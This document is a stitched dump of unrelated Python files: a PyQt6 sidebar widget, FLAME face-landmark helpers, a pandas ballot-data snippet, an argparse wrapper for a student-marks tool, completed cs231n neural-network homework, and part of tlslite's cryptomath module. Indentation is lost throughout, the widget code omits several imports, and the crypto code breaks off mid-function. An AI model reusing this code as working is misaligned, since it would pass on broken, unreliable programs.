from PyQt6.QtWidgets import QFrame, QGraphicsDropShadowEffect, QPushButton, QVBoxLayout
from .component.Font import Font
from .Account import Account
class Side(QFrame):
def __init__(self, inform, *args):
super().__init__(*args)
        # inform notifies the parent when the selected option changes
self.inform = inform
self.initUI()
def initUI(self):
userButton = QPushButton()
downloadButton = QPushButton(" 下载")
viewButton = QPushButton(" 查看")
aboutButton = QPushButton(" 关于")
settingButton = QPushButton(" 设置")
        # Store all button objects on this widget
        self.buttonList = [userButton, downloadButton, viewButton, settingButton, aboutButton]
        # Make the buttons checkable
downloadButton.setCheckable(True)
viewButton.setCheckable(True)
settingButton.setCheckable(True)
userButton.setCheckable(True)
aboutButton.setCheckable(True)
        # Set the button icons
settingIcon = QIcon("icons/setting.svg")
settingButton.setIcon(settingIcon)
downloadIcon = QIcon("icons/download.svg")
downloadButton.setIcon(downloadIcon)
viewIcon = QIcon("icons/view.svg")
viewButton.setIcon(viewIcon)
aboutIcon = QIcon("icons/about.svg")
aboutButton.setIcon(aboutIcon)
        # userButton gets its own fixed height
        userButton.setFixedHeight(80)
        # Set up the layout
vbox = QVBoxLayout()
for button in self.buttonList:
vbox.addWidget(button)
vbox.addStretch(1)
vbox.setSpacing(0)
self.setLayout(vbox)
        # Adjust the layout margins
        vbox.setContentsMargins(0, 0, 0, 0)
        self.setContentsMargins(0, 0, 0, 0)
        # Connect the click handler of every button
for button in self.buttonList:
button.clicked[bool].connect(self.pressButton)
        # Set the style sheets
buttonStyle = """
QPushButton {
padding-top: 10px;
padding-bottom: 10px;
background-color: rgb(245, 245, 245);
border-bottom-width: 1px;
border-bottom-style: solid;
border-bottom-color: rgb(220, 220, 220);
border: none;
}
QPushButton:hover {
background-color: rgb(230, 230, 230);
}
QPushButton:checked {
background-color: rgb(220, 220, 220);
}
"""
downloadButton.setStyleSheet(buttonStyle)
viewButton.setStyleSheet(buttonStyle)
settingButton.setStyleSheet(buttonStyle)
userButton.setStyleSheet(buttonStyle)
aboutButton.setStyleSheet(buttonStyle)
downloadButton.setFont(Font.LEVEL3)
viewButton.setFont(Font.LEVEL3)
settingButton.setFont(Font.LEVEL3)
userButton.setFont(Font.LEVEL3)
aboutButton.setFont(Font.LEVEL3)
downloadButton.setCursor(QtCore.Qt.CursorShape.PointingHandCursor)
viewButton.setCursor(QtCore.Qt.CursorShape.PointingHandCursor)
settingButton.setCursor(QtCore.Qt.CursorShape.PointingHandCursor)
userButton.setCursor(QtCore.Qt.CursorShape.PointingHandCursor)
aboutButton.setCursor(QtCore.Qt.CursorShape.PointingHandCursor)
self.setStyleSheet(
"""
QFrame {
background-color: rgb(245, 245, 245);
}
"""
)
qds = QGraphicsDropShadowEffect()
qds.setOffset(0, 0)
qds.setColor(QColor(200, 200, 200))
qds.setBlurRadius(15)
self.setGraphicsEffect(qds)
# self.raise_()
def pressButton(self, val):
pressObj = self.sender()
if not val:
pressObj.setChecked(True)
else:
if self.inform(self.buttonList.index(pressObj)):
for button in self.buttonList:
if button != pressObj:
button.setChecked(False)
pressObj.setChecked(True)
else:
pressObj.setChecked(False)
    # Click the button with index val to switch the view
def changeView(self, val):
if val >= len(self.buttonList) or val < 0:
return
self.buttonList[val].click()
    # Update the user-state icon
def stateChange(self, state):
if state == Account.State.NONE or state == Account.State.UNKNOWN:
userIcon = QIcon("icons/user.svg")
elif state == Account.State.ERROR or state == Account.State.NETWORK_ANOMALY:
userIcon = QIcon("icons/cry.svg")
elif state == Account.State.OK:
userIcon = QIcon("icons/smile.svg")
elif state == Account.State.QUERY:
userIcon = QIcon("icons/query.svg")
else:
userIcon = QIcon("icons/error.svg")
self.buttonList[0].setIcon(userIcon)
self.buttonList[0].setIconSize(QSize(60, 60))
|
'''
Max-Planck-Gesellschaft zur Foerderung der Wissenschaften e.V. (MPG) is holder of all proprietary rights on this
computer program.
You can only use this computer program if you have closed a license agreement with MPG or you get the right to use
the computer program from someone who is authorized to grant you that right.
Any use of the computer program without a valid license is prohibited and liable to prosecution.
Copyright 2019 Max-Planck-Gesellschaft zur Foerderung der Wissenschaften e.V. (MPG). acting on behalf of its
Max Planck Institute for Intelligent Systems and the Max Planck Institute for Biological Cybernetics.
All rights reserved.
More information about FLAME is available at http://flame.is.tue.mpg.de.
For comments or questions, please email us at flame@tue.mpg.de
'''
import cv2
import sys
import pickle
import numpy as np
import tensorflow as tf
from psbody.mesh.sphere import Sphere
def load_binary_pickle(filepath):
with open(filepath, 'rb') as f:
if sys.version_info >= (3, 0):
data = pickle.load(f, encoding='latin1')
else:
data = pickle.load(f)
return data
def create_lmk_spheres(lmks, radius, color=[255.0, 0.0, 0.0]):
spheres = []
for lmk in lmks:
spheres.append(Sphere(lmk, radius).to_mesh(color))
return spheres
def load_embedding( file_path ):
""" funciton: load landmark embedding, in terms of face indices and barycentric coordinates for corresponding landmarks
note: the included example is corresponding to CMU IntraFace 49-point landmark format.
"""
lmk_indexes_dict = load_binary_pickle( file_path )
lmk_face_idx = lmk_indexes_dict[ 'lmk_face_idx' ].astype( np.uint32 )
lmk_b_coords = lmk_indexes_dict[ 'lmk_b_coords' ]
return lmk_face_idx, lmk_b_coords
def tf_get_model_lmks(tf_model, f, lmk_face_idx, lmk_b_coords):
"""Get a differentiable landmark embedding in the FLAME surface"""
faces = f[lmk_face_idx].astype(np.int32)
return tf.einsum('ijk,ij->ik', tf.gather(tf_model, faces), tf.convert_to_tensor(lmk_b_coords))
def tf_project_points(points, scale, trans):
'''
weak perspective camera
'''
return tf.scalar_mul(scale, tf.transpose(tf.linalg.matmul(tf.eye(num_rows=2, num_columns=3, dtype=points.dtype), points, transpose_b=True)) + trans)
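# In plain terms (an explanatory note added here, not original documentation):
# tf.eye(2, 3) @ points^T keeps only the x/y coordinates, so the projection above is
#   projected = scale * (points[:, :2] + trans)
# i.e. a weak-perspective camera drops z, applies a 2D translation and a global scale.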
def visualize_landmarks(img, lmks):
for i, (x, y) in enumerate(lmks):
cv2.circle(img, (int(x), int(y)), 4, (0, 0, 255), -1)
font = cv2.FONT_HERSHEY_SIMPLEX
text = '%d' % (i+1)
textsize = cv2.getTextSize(text, font, 1, 2)[0]
cv2.putText(img, text, (int(x-textsize[0]/2.0)+5, int(y)-5), font, 0.5, (0, 0, 255), 1, cv2.LINE_AA)
def load_picked_points(filename):
"""
Load a picked points file (.pp) containing 3D points exported from MeshLab.
Returns a Numpy array of size Nx3
"""
f = open(filename, 'r')
def get_num(string):
pos1 = string.find('\"')
pos2 = string.find('\"', pos1 + 1)
return float(string[pos1 + 1:pos2])
def get_point(str_array):
if 'x=' in str_array[0] and 'y=' in str_array[1] and 'z=' in str_array[2]:
return [get_num(str_array[0]), get_num(str_array[1]), get_num(str_array[2])]
else:
return []
pickedPoints = []
for line in f:
if 'point' in line:
            fields = line.split()
            if len(fields) < 4:
                continue
            ix = [i for i, s in enumerate(fields) if 'x=' in s][0]
            iy = [i for i, s in enumerate(fields) if 'y=' in s][0]
            iz = [i for i, s in enumerate(fields) if 'z=' in s][0]
            pickedPoints.append(get_point([fields[ix], fields[iy], fields[iz]]))
f.close()
return np.array(pickedPoints)
|
from pandas import read_csv, read_excel
expb = read_csv("expb.csv", encoding="cp1255")
ballots = read_excel("kalpies_full_report.xls")
expb_incountry = expb[expb['סמל ישוב'] != 99999]
final_results = expb.sum()
|
import argparse
ParserInformation = {
'epilog' : 'Example: coepy -regno 210514665432 -dob 12-06-2001',
'arguments' : {
'--register-number' : {
'short' : '-regno',
'type' : str,
            'help' : 'Register number of the student whose marks you want to check.'
},
'--date-of-birth': {
'short' : '-dob',
'type' : str,
            'help' : 'Date of birth of the student whose marks you want to check.'
},
'--json-info-file':{
'short' : '-jif',
'type' : str,
'help' : 'Parses the given file in json and returns information as requested for a single user.'
}
},
'actionArguments': {
'--assessment-mark' : {
'short' : '-am' ,
'help' : 'Returns the assessment mark with respect to the student.'
},
'--no-headless' : {
'short' : '-nh',
            'help' : 'Disable headless mode, i.e. show the entire browser when processing.'
},
'--verbose' : {
'short' : '-v',
'help' : 'Activate Verbose mode.'
},
'--quick-browse' : {
'short' : '-qb',
            'help' : 'Simply logs you into the COE WEBSITE in a blink and sustains the state in a browser!'
}
}
}
class CoePyArgumentParser(object):
_mParser = None
_mProcessed = None
def __init__(self):
self._mParser = argparse.ArgumentParser(epilog = ParserInformation['epilog'])
Args = ParserInformation['arguments']
for e in Args:
self._mParser.add_argument(e, Args[e]['short'],type=Args[e]['type'],help=Args[e]['help'])
ActionArgs = ParserInformation['actionArguments']
for e in ActionArgs:
self._mParser.add_argument(e , ActionArgs[e]['short'] , action='count' , help=ActionArgs[e]['help'])
self._mProcessed = vars(self._mParser.parse_args())
def printHelp(self):
return self._mParser.print_help()
def isEmpty(self):
ret = True
for e in self._mProcessed:
            if self._mProcessed[e] is not None:
ret = False
break
return ret
def getValue(self , key):
ret = None
        try:
            ret = self._mProcessed[str(key)]
        except KeyError:
            ret = None
        return ret
|
import numpy as np
from cs231n.layers import *
from cs231n.layer_utils import *
class TwoLayerNet(object):
"""
A two-layer fully-connected neural network with ReLU nonlinearity and
softmax loss that uses a modular layer design. We assume an input dimension
of D, a hidden dimension of H, and perform classification over C classes.
    The architecture should be affine - relu - affine - softmax.
Note that this class does not implement gradient descent; instead, it
will interact with a separate Solver object that is responsible for running
optimization.
The learnable parameters of the model are stored in the dictionary
self.params that maps parameter names to numpy arrays.
"""
def __init__(self, input_dim=3*32*32, hidden_dim=100, num_classes=10,
weight_scale=1e-3, reg=0.0):
"""
Initialize a new network.
Inputs:
- input_dim: An integer giving the size of the input
- hidden_dim: An integer giving the size of the hidden layer
- num_classes: An integer giving the number of classes to classify
- dropout: Scalar between 0 and 1 giving dropout strength.
- weight_scale: Scalar giving the standard deviation for random
initialization of the weights.
- reg: Scalar giving L2 regularization strength.
"""
self.params = {}
self.reg = reg
############################################################################
# TODO: Initialize the weights and biases of the two-layer net. Weights #
# should be initialized from a Gaussian with standard deviation equal to #
# weight_scale, and biases should be initialized to zero. All weights and #
# biases should be stored in the dictionary self.params, with first layer #
# weights and biases using the keys 'W1' and 'b1' and second layer weights #
# and biases using the keys 'W2' and 'b2'. #
############################################################################
self.params['W1'] = weight_scale * np.random.randn(input_dim, hidden_dim)
self.params['b1'] = np.zeros(hidden_dim)
self.params['W2'] = weight_scale * np.random.randn(hidden_dim, num_classes)
self.params['b2'] = np.zeros(num_classes)
############################################################################
# END OF YOUR CODE #
############################################################################
def sigmoid(self, x):
return 1 / ( 1 + np.exp(-x))
def relu(self, x):
return np.maximum(0, x)
def loss(self, X, y=None):
"""
Compute loss and gradient for a minibatch of data.
Inputs:
- X: Array of input data of shape (N, d_1, ..., d_k)
- y: Array of labels, of shape (N,). y[i] gives the label for X[i].
Returns:
If y is None, then run a test-time forward pass of the model and return:
- scores: Array of shape (N, C) giving classification scores, where
scores[i, c] is the classification score for X[i] and class c.
If y is not None, then run a training-time forward and backward pass and
return a tuple of:
- loss: Scalar value giving the loss
- grads: Dictionary with the same keys as self.params, mapping parameter
names to gradients of the loss with respect to those parameters.
"""
scores = None
############################################################################
# TODO: Implement the forward pass for the two-layer net, computing the #
# class scores for X and storing them in the scores variable. #
############################################################################
# If X has more than 2 dimensions then reshape so that X has 2 dimensions
if len(X.shape) > 2:
X = np.reshape(X, (X.shape[0], X.shape[1]*X.shape[2]*X.shape[3]))
# Unpack variables from the params dictionary
W1, b1 = self.params['W1'], self.params['b1']
W2, b2 = self.params['W2'], self.params['b2']
reg = self.reg
N = X.shape[0]
a1 = np.dot(X, W1) + b1
hidden_layer = self.relu(a1) # ReLU activation
scores = np.dot(hidden_layer, W2) + b2
# compute the class probabilities
exp_scores = np.exp(scores)
probs = exp_scores / np.sum(exp_scores, axis=1, keepdims=True) # [N x K]
# average cross-entropy loss and regularization
        correct_logprobs = -np.log(probs[range(N),y])
        data_loss = np.sum(correct_logprobs)/N
reg_loss = 0.5*reg*np.sum(W1*W1) + 0.5*reg*np.sum(W2*W2)
loss = data_loss + reg_loss
############################################################################
# END OF YOUR CODE #
############################################################################
# If y is None then we are in test mode so just return scores
if y is None:
return scores
grads = {}
############################################################################
# TODO: Implement the backward pass for the two-layer net. Store the loss #
# in the loss variable and gradients in the grads dictionary. Compute data #
# loss using softmax, and make sure that grads[k] holds the gradients for #
# self.params[k]. Don't forget to add L2 regularization! #
# #
# NOTE: To ensure that your implementation matches ours and you pass the #
# automated tests, make sure that your L2 regularization includes a factor #
# of 0.5 to simplify the expression for the gradient. #
############################################################################
# compute the gradient on scores
dscores = probs
dscores[range(N),y] -= 1
dscores /= N
# W2 and b2
grads['W2'] = np.dot(hidden_layer.T, dscores)
grads['b2'] = np.sum(dscores, axis=0)
# next backprop into hidden layer
dhidden = np.dot(dscores, W2.T)
# backprop the ReLU non-linearity
dhidden[hidden_layer <= 0] = 0
# finally into W,b
grads['W1'] = np.dot(X.T, dhidden)
grads['b1'] = np.sum(dhidden, axis=0)
# add regularization gradient contribution
grads['W2'] += reg * W2
grads['W1'] += reg * W1
############################################################################
# END OF YOUR CODE #
############################################################################
return loss, grads
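# Minimal smoke test for TwoLayerNet (an illustrative addition; the sizes below are
# arbitrary assumptions, not values from the assignment):
#
#   net = TwoLayerNet(input_dim=4, hidden_dim=8, num_classes=3)
#   X = np.random.randn(5, 4)
#   y = np.random.randint(3, size=5)
#   loss, grads = net.loss(X, y)   # grads has the same keys as net.params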
class FullyConnectedNet(object):
"""
A fully-connected neural network with an arbitrary number of hidden layers,
ReLU nonlinearities, and a softmax loss function. This will also implement
dropout and batch normalization as options. For a network with L layers,
the architecture will be
{affine - [batch norm] - relu - [dropout]} x (L - 1) - affine - softmax
where batch normalization and dropout are optional, and the {...} block is
repeated L - 1 times.
Similar to the TwoLayerNet above, learnable parameters are stored in the
self.params dictionary and will be learned using the Solver class.
"""
def __init__(self, hidden_dims, input_dim=3*32*32, num_classes=10,
dropout=0, use_batchnorm=False, reg=0.0,
weight_scale=1e-2, dtype=np.float32, seed=None):
"""
Initialize a new FullyConnectedNet.
Inputs:
- hidden_dims: A list of integers giving the size of each hidden layer.
- input_dim: An integer giving the size of the input.
- num_classes: An integer giving the number of classes to classify.
- dropout: Scalar between 0 and 1 giving dropout strength. If dropout=0 then
the network should not use dropout at all.
- use_batchnorm: Whether or not the network should use batch normalization.
- reg: Scalar giving L2 regularization strength.
- weight_scale: Scalar giving the standard deviation for random
initialization of the weights.
- dtype: A numpy datatype object; all computations will be performed using
this datatype. float32 is faster but less accurate, so you should use
float64 for numeric gradient checking.
- seed: If not None, then pass this random seed to the dropout layers. This
      will make the dropout layers deterministic so we can gradient check the
model.
"""
self.use_batchnorm = use_batchnorm
self.use_dropout = dropout > 0
self.reg = reg
self.num_layers = 1 + len(hidden_dims)
self.dtype = dtype
self.params = {}
self.hidden_layers = {}
############################################################################
# TODO: Initialize the parameters of the network, storing all values in #
# the self.params dictionary. Store weights and biases for the first layer #
# in W1 and b1; for the second layer use W2 and b2, etc. Weights should be #
# initialized from a normal distribution with standard deviation equal to #
# weight_scale and biases should be initialized to zero. #
# #
# When using batch normalization, store scale and shift parameters for the #
# first layer in gamma1 and beta1; for the second layer use gamma2 and #
# beta2, etc. Scale parameters should be initialized to one and shift #
# parameters should be initialized to zero. #
############################################################################
# print
# print 'Initialize the parameters of the network'
# print
for i in range(1, self.num_layers+1):
W = 'W'+str(i)
b = 'b'+str(i)
if i == 1:
self.params[W] = weight_scale * np.random.randn(input_dim, hidden_dims[i-1])
self.params[b] = np.zeros(hidden_dims[i-1])
elif i == self.num_layers:
self.params[W] = weight_scale * np.random.randn(hidden_dims[i-2], num_classes)
self.params[b] = np.zeros(num_classes)
else:
self.params[W] = weight_scale * np.random.randn(hidden_dims[i-2], hidden_dims[i-1])
self.params[b] = np.zeros(hidden_dims[i-1])
############################################################################
# END OF YOUR CODE #
############################################################################
# When using dropout we need to pass a dropout_param dictionary to each
# dropout layer so that the layer knows the dropout probability and the mode
# (train / test). You can pass the same dropout_param to each dropout layer.
self.dropout_param = {}
if self.use_dropout:
self.dropout_param = {'mode': 'train', 'p': dropout}
if seed is not None:
self.dropout_param['seed'] = seed
# With batch normalization we need to keep track of running means and
# variances, so we need to pass a special bn_param object to each batch
# normalization layer. You should pass self.bn_params[0] to the forward pass
# of the first batch normalization layer, self.bn_params[1] to the forward
# pass of the second batch normalization layer, etc.
self.bn_params = []
if self.use_batchnorm:
            self.bn_params = [{'mode': 'train'} for i in range(self.num_layers - 1)]
        # Cast all parameters to the correct datatype
        for k, v in self.params.items():
self.params[k] = v.astype(dtype)
def sigmoid(self, x):
return 1 / ( 1 + np.exp(-x))
def relu(self, x):
return np.maximum(0, x)
def loss(self, X, y=None):
"""
Compute loss and gradient for the fully-connected net.
Input / output: Same as TwoLayerNet above.
"""
X = X.astype(self.dtype)
mode = 'test' if y is None else 'train'
# Set train/test mode for batchnorm params and dropout param since they
# behave differently during training and testing.
if self.dropout_param is not None:
self.dropout_param['mode'] = mode
if self.use_batchnorm:
for bn_param in self.bn_params:
                bn_param['mode'] = mode
scores = None
cache_dict = {}
cache_dict_counter = 0
############################################################################
# TODO: Implement the forward pass for the fully-connected net, computing #
# the class scores for X and storing them in the scores variable. #
# #
# When using dropout, you'll need to pass self.dropout_param to each #
# dropout forward pass. #
# #
# When using batch normalization, you'll need to pass self.bn_params[0] to #
# the forward pass for the first batch normalization layer, pass #
# self.bn_params[1] to the forward pass for the second batch normalization #
# layer, etc. #
############################################################################
if len(X.shape) > 2:
X = np.reshape(X, (X.shape[0], X.shape[1]*X.shape[2]*X.shape[3]))
# for p in self.params:
# d = {k: v for k, v in self.params.iteritems()}
# p = d
N = X.shape[0]
hidden_layer = X
reg_loss = 0
for i in range(1, self.num_layers+1):
cache_dict[i] = {}
W = 'W'+str(i)
b = 'b'+str(i)
# Compute regularisation loss
reg_loss += 0.5 * self.reg * np.sum(self.params[W]*self.params[W])
# For every layer but not the last
# if i < self.num_layers:
# affine
a, cache_dict[i]['affine'] = affine_forward(hidden_layer, self.params[W], self.params[b])
#print 'forward affine'
cache_dict_counter += 1
# if last layer then only make affine_forward
if i == self.num_layers:
scores = a
break
# batch norm
# ToDo
# relu
hidden_layer, cache_dict[i]['relu'] = relu_forward(a)
#print 'forward relu'
cache_dict_counter += 1
# dropout
if self.use_dropout:
hidden_layer, cache_dict[i]['dropout'] = dropout_forward(hidden_layer, self.dropout_param)
#print 'forward dropout'
cache_dict_counter += 1
self.hidden_layers[i] = hidden_layer
# OLD
# a = np.dot(hidden_layer, self.params[W]) + self.params[b]
# hidden_layer = self.relu(a) # ReLU activation
# self.hidden_layers[i] = hidden_layer
# For last layer
# else:
# scores, cache_dict[i]['affine'] = affine_forward(hidden_layer, self.params[W], self.params[b])
# #print 'forward affine'
#
# cache_dict_counter += 1
# OLD
# scores = np.dot(hidden_layer, self.params[W]) + self.params[b]
#print 'softmax'
# dscores = dx
# old
# compute the class probabilities
# exp_scores = np.exp(scores)
# probs = exp_scores / np.sum(exp_scores, axis=1, keepdims=True) # [N x K]
#
# # average cross-entropy loss and regularization
# correct_logprobs = -np.log(probs[range(N),y])
# data_loss = np.sum(correct_logprobs)/N
############################################################################
# END OF YOUR CODE #
############################################################################
# If test mode return early
if mode == 'test':
#print '---- return scores - no back ----'
return scores
grads = {}
############################################################################
# TODO: Implement the backward pass for the fully-connected net. Store the #
# loss in the loss variable and gradients in the grads dictionary. Compute #
# data loss using softmax, and make sure that grads[k] holds the gradients #
# for self.params[k]. Don't forget to add L2 regularization! #
# #
# When using batch normalization, you don't need to regularize the scale #
# and shift parameters. #
# #
# NOTE: To ensure that your implementation matches ours and you pass the #
# automated tests, make sure that your L2 regularization includes a factor #
# of 0.5 to simplify the expression for the gradient. #
############################################################################
# print
# print 'Implement the backward pass'
# print
# OLD
# compute the gradient on scores
# dscores = probs
# dscores[range(N),y] -= 1
# dscores /= N
# Loop backwards
#print "len(cache_dict)", len(cache_dict)
#for k in list(reversed(sorted(cache_dict.keys()))):
#print "len(cache_dict[k])", len(cache_dict[k])
# affine backward
#dx, dw, db = affine_backward(dx, cache_dict[k])
# dropout backward
# relu backward
# batch norm backward
#print "len(cache_dict[k])", len(cache_dict[k])
# for cache in cache_dict:
# d = {k: v for k, v in cache_dict.iteritems()}
# print d
# softmax loss
loss, dx = softmax_loss(scores, y)
loss += reg_loss
# Loop backwards, i = 1 is last value
for i in range(self.num_layers, 0, -1):
W = 'W'+str(i)
b = 'b'+str(i)
# dropout
if 'dropout' in cache_dict[i]:
#print 'back dropout'
dx = dropout_backward(dx, cache_dict[i]['dropout'])
# relu
if 'relu' in cache_dict[i]:
#print 'back relu'
dx = relu_backward(dx, cache_dict[i]['relu'])
if 'batch' in cache_dict[i]:
# Batch normalization backward pass is not implemented here; the forward
# pass above never stores a 'batch' cache, so this branch is a placeholder.
pass
# affine
if 'affine' in cache_dict[i]:
#print 'back affine'
dx, dw, db = affine_backward(dx, cache_dict[i]['affine'])
grads[W] = dw
# add regularisation
grads[W] += self.reg * self.params[W]
grads[b] = db
# if i == self.num_layers:
#
# grads[W] = np.dot(self.hidden_layers[i-1].T, dscores)
# grads[b] = np.sum(dscores, axis=0)
#
# # add regularisation
# grads[W] += self.reg * self.params[W]
#
# # next backprop into hidden layer
# dhidden = np.dot(dscores, self.params[W].T)
#
# # backprop the ReLU non-linearity
# dhidden[self.hidden_layers[i-1] <= 0] = 0
#
# elif i > 1:
#
# grads[W] = np.dot(self.hidden_layers[i-1].T, dhidden)
# grads[b] = np.sum(dhidden, axis=0)
#
# # add regularisation
# grads[W] += self.reg * self.params[W]
#
# # next backprop into hidden layer
# dhidden = np.dot(dhidden, self.params[W].T)
#
# # backprop the ReLU non-linearity
# dhidden[self.hidden_layers[i-1] <= 0] = 0
#
# else:
# # finally into W,b
# grads[W] = np.dot(X.T, dhidden)
# grads[b] = np.sum(dhidden, axis=0)
#
# # add regularization gradient contribution
# grads[W] += self.reg * self.params[W]
############################################################################
# END OF YOUR CODE #
############################################################################
return loss, grads
|
"""cryptomath module
This module has basic math/crypto code."""
import os
import math
import base64
import binascii
import hashlib as sha
#
# We don't need the compat stuff anymore, so few updates:
# numbits == x.bit_length
# numbytes == x.bit_length // 8
#
# Instead of array() use bytearray().
#
def numBytes(n):
if n == 0:
return 0
# ceil(n.bit_length() / 8)
return (n.bit_length() + 7) // 8
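# Illustrative check (not part of the original module): numBytes gives the byte
# length of the big-endian encoding of n, e.g.
#   numBytes(0) == 0, numBytes(255) == 1, numBytes(256) == 2, numBytes(2**16) == 3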
# **************************************************************************
# Load Optional Modules
# **************************************************************************
# Try to load M2Crypto/OpenSSL
try:
from M2Crypto import m2
m2cryptoLoaded = True
except ImportError:
m2cryptoLoaded = False
# Try to load cryptlib
try:
import cryptlib_py
try:
cryptlib_py.cryptInit()
except cryptlib_py.CryptException as e:
#If tlslite and cryptoIDlib are both present,
#they might each try to re-initialize this,
#so we're tolerant of that.
if e.args[0] != cryptlib_py.CRYPT_ERROR_INITED:
raise
cryptlibpyLoaded = True
except ImportError:
cryptlibpyLoaded = False
#Try to load GMPY
try:
import gmpy
gmpyLoaded = True
except ImportError:
gmpyLoaded = False
#Try to load pycrypto
try:
import Crypto.Cipher.AES
pycryptoLoaded = True
except ImportError:
pycryptoLoaded = False
# **************************************************************************
# PRNG Functions
# **************************************************************************
# Get os.urandom PRNG
try:
os.urandom(1)
def getRandomBytes(howMany):
return bytearray(os.urandom(howMany))
prngName = "os.urandom"
except:
# Else get cryptlib PRNG
if cryptlibpyLoaded:
def getRandomBytes(howMany):
randomKey = cryptlib_py.cryptCreateContext(cryptlib_py.CRYPT_UNUSED,
cryptlib_py.CRYPT_ALGO_AES)
cryptlib_py.cryptSetAttribute(randomKey,
cryptlib_py.CRYPT_CTXINFO_MODE,
cryptlib_py.CRYPT_MODE_OFB)
cryptlib_py.cryptGenerateKey(randomKey)
bytes = bytearray(howMany)
cryptlib_py.cryptEncrypt(randomKey, bytes)
return bytes
prngName = "cryptlib"
else:
#Else get UNIX /dev/urandom PRNG
try:
devRandomFile = open("/dev/urandom", "rb")
def getRandomBytes(howMany):
return bytearray(devRandomFile.read(howMany))
prngName = "/dev/urandom"
except IOError:
#Else get Win32 CryptoAPI PRNG
try:
import win32prng
def getRandomBytes(howMany):
s = win32prng.getRandomBytes(howMany)
if len(s) != howMany:
raise AssertionError()
return bytearray(s)
prngName = "CryptoAPI"
except ImportError:
#Else no PRNG :-(
def getRandomBytes(howMany):
raise NotImplementedError("No Random Number Generator "\
"available.")
prngName = "None"
# **************************************************************************
# Converter Functions
# **************************************************************************
def numberFromBytes(a):
total = 0
multiplier = 1
for count in range(len(a) - 1, -1, -1):
byte = a[count]
total += multiplier * byte
multiplier *= 256
return total
def bytesOfNumber(n):
howManyBytes = numBytes(n)
# Fill the most-significant byte first (big-endian), matching numberFromBytes().
ba = bytearray(howManyBytes)
for count in range(howManyBytes - 1, -1, -1):
ba[count] = n % 256
n >>= 8
return ba
def base64ToBytes(s):
try:
return base64.decodebytes(s)
except binascii.Error as e:
raise SyntaxError(e)
except binascii.Incomplete as e:
raise SyntaxError(e)
def bytesToBase64(s):
return base64.encodebytes(s).replace(b"\n", b"")
def numberToBase64(n):
return bytesToBase64(bytesOfNumber(n))
def base64ToNumber(bstr):
return numberFromBytes(base64ToBytes(bstr))
def mpiToNumber(mpi): #mpi is an openssl-format bignum string
if (mpi[4] & 0x80) != 0: #Make sure this is a positive number
raise AssertionError()
return numberFromBytes(mpi[4:])
def numberToMPI(n):
ba = bytearray(bytesOfNumber(n))
ext = 0
#If the high-order bit is going to be set,
#add an extra byte of zeros
if (n.bit_length() & 0x7) == 0:
ext = 1
length = numBytes(n) + ext
ba = bytearray(4 + ext) + ba
ba[0] = (length >> 24) & 0xFF
ba[1] = (length >> 16) & 0xFF
ba[2] = (length >> 8) & 0xFF
ba[3] = length & 0xFF
return ba # no need to make it immutable now
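# Sketch of the MPI layout built above (derived from this code, not from OpenSSL docs):
# a 4-byte big-endian length field, then the big-endian magnitude, with one extra
# leading zero byte whenever the top bit of the magnitude would otherwise be set, e.g.
#   numberToMPI(255) -> bytearray(b'\x00\x00\x00\x02\x00\xff')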
# **************************************************************************
# Misc. Utility Functions
# **************************************************************************
def hashAndBase64(s):
return bytesToBase64(sha.sha1(s).digest())
def getBase64Nonce(numChars = 22): #defaults to a 132-bit nonce
rb = getRandomBytes(numChars)
return bytesToBase64(rb)[:numChars]
# **************************************************************************
# Big Number Math
# **************************************************************************
def getRandomNumber(low, high):
if low >= high:
raise AssertionError()
howManyBits = high.bit_length()
howManyBytes = numBytes(high)
lastBits = howManyBits % 8
while 1:
ba = getRandomBytes(howManyBytes)
if lastBits:
ba[0] = ba[0] % (1 << lastBits)
n = numberFromBytes(ba)
if n >= low and n < high:
return n
def gcd(a, b):
a, b = max(a, b), min(a, b)
while b:
a, b = b, a % b
return a
def lcm(a, b):
return (a * b) // gcd(a, b)
#Returns inverse of a mod b, zero if none
#Uses Extended Euclidean Algorithm
def invMod(a, b):
c, d = a, b
uc, ud = 1, 0
while c != 0:
q = d // c
c, d = d - (q * c), c
uc, ud = ud - (q * uc), uc
if d == 1:
return ud % b
return 0
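# Illustrative examples (not part of the original module):
#   invMod(3, 11) == 4   since (3 * 4) % 11 == 1
#   invMod(2, 4)  == 0   since 2 has no inverse modulo 4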
if gmpyLoaded:
def powMod(base, power, modulus):
base = gmpy.mpz(base)
power = gmpy.mpz(power)
modulus = gmpy.mpz(modulus)
result = pow(base, power, modulus)
return int(result)
else:
#Copied from Bryan G. Olson's post to comp.lang.python
#Does left-to-right instead of pow()'s right-to-left,
#thus about 30% faster than the python built-in with small bases
def powMod(base, power, modulus):
""" Return base**power mod modulus, using multi bit scanning
with nBitScan bits at a time."""
nBitScan = 5
#TREV - Added support for negative exponents
negativeResult = False
if (power < 0):
power *= -1
negativeResult = True
exp2 = 2 ** nBitScan
mask = exp2 - 1
# Break power into a list of digits of nBitScan bits.
# The list is recursive so easy to read in reverse direction.
nibbles = None
while power:
nibbles = int(power & mask), nibbles
power = power >> nBitScan
# Make a table of powers of base up to 2**nBitScan - 1
lowPowers = [1]
for i in range(1, exp2):
lowPowers.append((lowPowers[i - 1] * base) % modulus)
# To exponentiate by the first nibble, look it up in the table
nib, nibbles = nibbles
prod = lowPowers[nib]
# For the rest, square nBitScan times, then multiply by
# base^nibble
while nibbles:
nib, nibbles = nibbles
for i in range(nBitScan):
prod = (prod * prod) % modulus
if nib: prod = (prod * lowPowers[nib]) % modulus
#TREV - Added support for negative exponents
if negativeResult:
prodInv = invMod(prod, modulus)
#Check to make sure the inverse is correct
if (prod * prodInv) % modulus != 1:
raise AssertionError()
return prodInv
return prod
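# Illustrative check (not part of the original module):
#   powMod(3, 4, 5) == 1    since 3**4 == 81 and 81 % 5 == 1
#   powMod(3, -1, 5) == 2   the pure-Python fallback inverts for negative exponents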
#Pre-calculate a sieve of the 168 primes < 1000:
def makeSieve(n):
sieve = list(range(n))
for count in range(2, int(math.sqrt(n)) + 1):
if sieve[count] == 0:
continue
x = sieve[count] * 2
while x < len(sieve):
sieve[x] = 0
x += sieve[count]
sieve = [x for x in sieve[2:] if x]
return sieve
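# Small illustrative example (not part of the original module):
#   makeSieve(10) == [2, 3, 5, 7]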
sieve = makeSieve(1000)
def isPrime(n, iterations = 5, display = False):
#Trial division with sieve
for x in sieve:
if x >= n: return True
if n % x == 0: return False
#Passed trial division, proceed to Rabin-Miller
#Rabin-Miller implemented per Ferguson & Schneier
#Compute s, t for Rabin-Miller
if display: print("*", end = " ")
s, t = n - 1, 0
while s % 2 == 0:
s, t = s // 2, t + 1
#Repeat Rabin-Miller x times
a = 2 #Use 2 as a base for first iteration speedup, per HAC
